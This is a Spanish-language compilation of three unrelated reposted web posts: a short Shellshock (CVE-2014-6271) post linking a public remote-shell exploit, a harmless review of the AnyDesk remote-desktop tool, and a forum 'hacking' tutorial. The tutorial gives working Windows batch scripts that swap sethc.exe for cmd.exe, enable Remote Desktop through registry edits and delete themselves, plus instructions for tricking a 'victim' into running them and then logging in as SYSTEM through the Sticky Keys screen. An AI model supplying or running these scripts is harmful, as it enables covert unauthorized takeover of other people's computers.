Abrir una shell remota explotando el CVE-2014-6271 (Shellshock)

Buenas a todos, en el post de hoy veremos una de las miles de PoC que han surgido para explotar la tan comentada vulnerabilidad "GNU Bash CVE-2014-6271 Remote Code Execution Vulnerability", también conocida como "shellshock".

Explotar esta falla de seguridad tiene infinidad de posibilidades, y una de las más interesantes involucra a los servidores web que utilizan el motor CGI apoyándose en el sistema operativo para ejecutar sus servicios.

En Security Focus se han publicado numerosos exploits que afectan a gran variedad de servidores y que podéis ver en el siguiente enlace:

http://www.securityfocus.com/bid/70103/exploit

Uno de los más interesantes de ese listado es el 70103_3.py, que nos permitirá abrir una shell remota contra un servidor vulnerable:

http://downloads.securityfocus.com/vulnerabilities/exploits/70103_3.py

Su uso es muy sencillo, y al estilo meterpreter, configuraremos el exploit para atacar al servidor vulnerable que nos interese auditar:

Si el exploit tiene éxito, veremos el prompt de la máquina vulnerada y podremos ejecutar cualquier instrucción. Como ejemplo, nosotros hemos lanzado un "whoami" para ver con qué usuario se estaba ejecutando el servidor:

Como no podía ser de otra manera, en lo referente a shellshock os recomiendo el artículo de mi compañero Pablo en el que detalla el proceso para desarrollar nuestro propio módulo de Metasploit para Shellshock.

Shellshock está dando mucho que hablar, y no es para menos, ya que como veis se trata de una de las vulnerabilidades más destacadas de los últimos tiempos.

Hasta el próximo post,

Saludos!

 

Fuente: http://www.flu-project.com/2014/10/abrir-una-shell-remota-explotando-el.html

AnyDesk, una completa alternativa para TeamViewer

No podemos negar que TeamViewer ha sido, casi desde sus inicios, una herramienta imprescindible si queríamos conectarnos a ordenadores remotos. Sus funciones se han ido ampliando, además de hacerse más potente. Sin embargo, parece que algunos de los empleados de la compañía no estaban muy contentos con el producto, ya que han sido ellos los que han dimitido y lanzado su propio programa de conexión remota.

Así nacía AnyDesk, una aplicación que podríamos considerar como una excelente alternativa a TeamViewer. Sus características son muy similares, pero también es cierto que esta se centra, sobre todo, en que utilizar el proyecto sea algo sencillo y muy, muy facil. Sólo os decimos que su descarga tiene un tamaño de 1,14 MB, lo que significa que todo se ha simplificado para hacernos la vida mucho más fácil.

El programa no necesita instalación. Lo único que necesitaremos será descargar el fichero que está disponible en su página web y ejecutarlo. Enseguida se os abrirá la venta principal del programa, en la cual estarán disponibles todas sus funcionalidades, las cuales son pocas, pero las ideales para cumplir su cometido.

Es sencillo, pero no hace falta más

Cuando iniciemos AnyDesk, tendremos dos posibilidades: o bien nos conectamos a otro ordenador, o bien otro ordenador se conecta a nosotros. Cada vez que lo iniciéis se os proporcionará una dirección diferente, que será que tengáis que proporcionar, en el caso de que queráis que se conecten a vosotros. Como véis, algo realmente sencillo.
Por otra parte, tenemos que avisar de que el programa utiliza DeskRT, un nuevo códec de vídeo especialmente optimizado para que la información nos llegue con una calidad máxima, consumiendo el ancho de banda que únicamente sea necesario. También se usa erlang, una tecnología especialmente diseñada para redes telefónicas de un tamaño considerable y, además, a prueba de fallos, lo que garantiza que veamos todo de una forma más que correcta.
Si queréis, podéis echarle un vistazo a sus Ajustes, aunque ya os decimos que no será necesario a no ser que tengáis que poner alguna característica en especial. El programa viene preparado para que podamos utilizarlo sin problemas.

AnyDesk se encuentra disponible, de manera gratuita, para sistemas operativos Windows, aunque sus desarrolladores ya están trabajando en los clientes de otras plataformas, como iPad, MacOS X, Linux y Android, por lo que está claro que tendremos una gran variedad. Más adelante habrá versiones de pago para los usuarios más exigentes, aunque ya os decimos que con esta versión tenemos más que suficiente.


Más información | AnyDesk
http://www.genbeta.com/herramientas/anydesk-una-completa-alternativa-para-teamviewer

Hackear por Escritorio Remoto de Windows

este tutorial me parecio algo digamos "novedoso" pero definitivamente es muy rebuscadoy funciona! xD. lo encontre via portal hacker.

--------------------------------------------------------------------------------------------------

Hackear por Escritorio Remoto de Windows
(Empezando todo de nuevo..)

1)Escanear los puertos, para ver si tiene el puerto 3389 (El de escritorio
remoto)abierto, si es que tiene el puerto habilitado seguir el paso 2), si es que el puerto y Escritorio Remoto no esta funcionando el pasar al paso 2.1):

2)Crear un batch que haga los siguiente:

Citar

Código:

echo off
title .
Copy "c:\windows\system32\sethc.exe" "c:\windows\system32\sethc.zzz"
Copy "c:\windows\system32\cmd.exe" "c:\windows\system32\sethc.exe"
del %0
exit

Este batch lo que hace es crearnos un agujero para poder pasar. Setch es el programita que inicia cuando presionamos 5 veses Shift. Tambien es posible utilizar Sethc.exe en el escritorio Remoto de Windows.
Luego de alguna forma mandamos el batch a nuestra victima y cuando lo abra nos abrira el paso
y el batch se autoborrara.

2.1)Si es que no tiene habilitado el "Escritorio Remoto de Windows" creamos
el siguiente Batch para activarlo y crear el agujero que nos dejara pasar.

Citar

Código:

echo off
title .
cls
Copy "c:\windows\system32\sethc.exe" "c:\windows\system32\sethc.zzz"
Copy "c:\windows\system32\cmd.exe" "c:\windows\system32\sethc.exe"
reg delete "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnect ions /f
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnect ions /t "REG_DWORD" /d 0
del %0
exit

Y esto se lo enviamos ha la victima de alguna forma y al momento de abrirlo nos habilitara el
"Escritorio Remoto de Windows" y nos abrira el paso y el Batch se AutoBorrara.

3)Luego abrimos Inicio/programas/Accesorios/comunicaciones/ConeXion a escritorio remoto
Presionamos opciones, y rellenamos los datos de la pestaña General de la siguiente forma:
Equipo:1.2.3.4 <- Direcciona IP de la victima
Nombre de Usuario: <-No ponemos nada lo dejamos Vacio
Contraseña: <-Lo dejamos vacio.
Dominio: <-Lo dejamos vacio.

Luego nos pasamos a la pestaña "Recursos locales"
y cambiamos solo la opcion "Teclado", desplegamos la lista y seleccionamos "En el equipo remoto"

4)Luego click en conectar.

5)Cuando nos salga la ventanita pidiendo USER/PASS presionamos 5 veses SHIFT y nos saldra la ventanita de DOS en el equipo remoto y STICKYKEYS en nuestra maquina, el STICKYKEYS de nuestra maquina lo cerramos para que no nos moleste.

6)Ahora tenemos acceso a la raiz osea como SYSTEM (NT AUTHORITY\SYSTEM) teniendo es DOS en la mano, podemos iniciar algunos servicios como ser el telnet, o podemos modificar algunas cosas de su PC. (Esto si quieren, inicien: Compmgmt.msc).

7)Para finalizar debemos borrar el programa que nos dejo pasar, Recuerdan que hize una copia de Sethc.exe a Sethc.zzz ahora tenemos que volver las cosas como estaban.

Citar

Código:

copy "c:\windows\system32\setch.zzz" "c:\windows\system32\setch.exe"
del "c:\windows\system32\setch.zzz"

Microsoft creo "Escritorio Remoto de Windows" para que lo Explotemos
y lo usemos cuando no tengamos un troyano ha mano. (Claro que tambien es una herramienta util..)
SaluDOS!!!

FUENTE:http://foro.portalhacker.net/index.php/topic,79495.0.html